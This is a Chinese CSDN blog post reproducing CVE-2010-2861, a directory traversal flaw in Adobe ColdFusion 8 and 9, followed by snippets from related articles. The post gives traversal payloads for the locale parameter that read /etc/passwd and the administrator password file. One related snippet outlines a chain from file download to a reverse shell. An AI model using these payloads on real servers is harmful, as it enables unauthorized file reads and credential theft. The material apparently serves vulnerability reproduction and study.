Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

最新推荐文章于 2024-08-22 10:31:14 发布
最新推荐文章于 2024-08-22 10:31:14 发布
阅读量291 收藏
点赞数
分类专栏: 学海无涯 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/121745329
版权

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

产品样子:

漏洞复现

登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可

读取后台用户密码

locale=../../../../../../../lib/password.properties%00en

 

 

        

 

时光凉春衫薄
关注
专栏目录
漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767
失心少年
04-23 789
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该平台ColdFusion 2023
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2024-20767)
0xSec
03-31 964
由于 Adobe ColdFusion 的访问控制不当,未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件,泄露敏感信息。
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
最新发布
iSee857的博客
08-22 272
漏洞是由于Adobe ColdFusion中getHeartBeat类继承了UDFMethod,并且在getAccess中方法返回3 绕过权限校验导致未授权,未经身份认证的远程攻击者可通过构造恶意请求读取目标服务器上的任意文件,进而泄露敏感信息。从源码上看这个servlet里module可选多个,危害较大的为logging时候的任意文件读取与heap_dump时候的deapdump下载。首先获取access为3的类 绕过权限检测,这里getHeartBeat类恰好为3。
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861
sszsNo1的博客
07-02 324
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
漏洞复现-Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
玄道的网安博客
08-11 1393
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如标签中的元素与属性将由StringHandler处理,标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
coldfusion文件读取漏洞CVE-2010-2861
1stPeak's Blog
07-28 954
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现
ADummy的博客
02-22 925
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ AdobeColdFusion是一款高效的网络应用服务器开发环境。AdobeColdFusion9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/admin
漏洞分析|Adobe ColdFusion 序列化漏洞CVE-2023-29300)
m0_46699477的博客
08-02 1185
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现此漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
易编橙 · 终身成长社群,相遇已是上上签!
10-19 3881
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞CVE-2010-2861
JiangBuLiu的博客
06-28 950
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(Cold...
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)
0xSec
01-28 843
Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Adobe ColdFusion
05-13
Adobe ColdFusion ColdFusion初級教程繁體中文
CVE-2010-2861Adobe ColdFusion 文件读取
Foreverlove112的博客
11-08 346
CVE-2010-2861Adobe ColdFusion 文件读取
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 368
CVE-2010-2861
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)
shierbai的博客
06-21 293
locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`locale=../../../../../../../lib/password.properties%00en`搭建环境后,访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
Adobe ColdFusion RCE(CVE-2019-7839) 漏洞分析
systemino的博客
08-05 634
漏洞简介 Adobe ColdFusion 是一个商用的快速开发平台。它可以作为一个开发平台使用,也可以提供Flash远程服务或者作为 Adobe Flex应用的后台服务器 。 2019年06月11日,Adobe 发布安全公告,修复了Adobe ColdFusion多个严重漏洞。其中有一个由Moritz Bechler提交的命令注入漏洞(CVE-2019-7839)。 2019年06月26日...
漏洞分析|Adobe ColdFusion WDDX 序列化漏洞利用
m0_46699477的博客
09-07 441
本文将分享继 CVE-2023-29300 之后的不出网利用方式,提出 C3P0 和 JGroups 两条基于服务错误部署的新利用链。现 Goby 中实现了 C3P0 和 JGroups 利用链的完整利用,完全支持命令执行以及结果回显功能。
CVE-2021-26885利用poc
07-18
CVE-2021-26885是一个安全漏洞的标识符,它通常与软件中的远程代码执行(RCE)风险有关。这个漏洞可能是由于Adobe ColdFusion组件的一个缺陷导致的,ColdFusion是一种服务器端脚本语言环境。POC,即Proof of Concept(验证漏洞存在的演示程序),是一个小型的示例代码,用于展示如何利用这个漏洞。 POC可能会包含以下几个步骤: 1. 检测目标系统是否存在该版本的ColdFusion,并确认其存在CVE-26885漏洞。 2. 利用冷fusion解析恶意请求的方式,比如通过精心构造的HTTP请求或文件上传。 3. 在服务器上运行预设的命令或执行恶意代码片段,如果攻击者能够成功触发这个漏洞。 需要注意的是,分享和使用POC通常是非法的,因为它可能被滥用来发起攻击。如果你遇到这种情况,应该立即修复受影响的系统,避免给网络带来威胁。如果你发现了自己的系统有此漏洞,应尽快更新到安全补丁或者关闭受影响的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值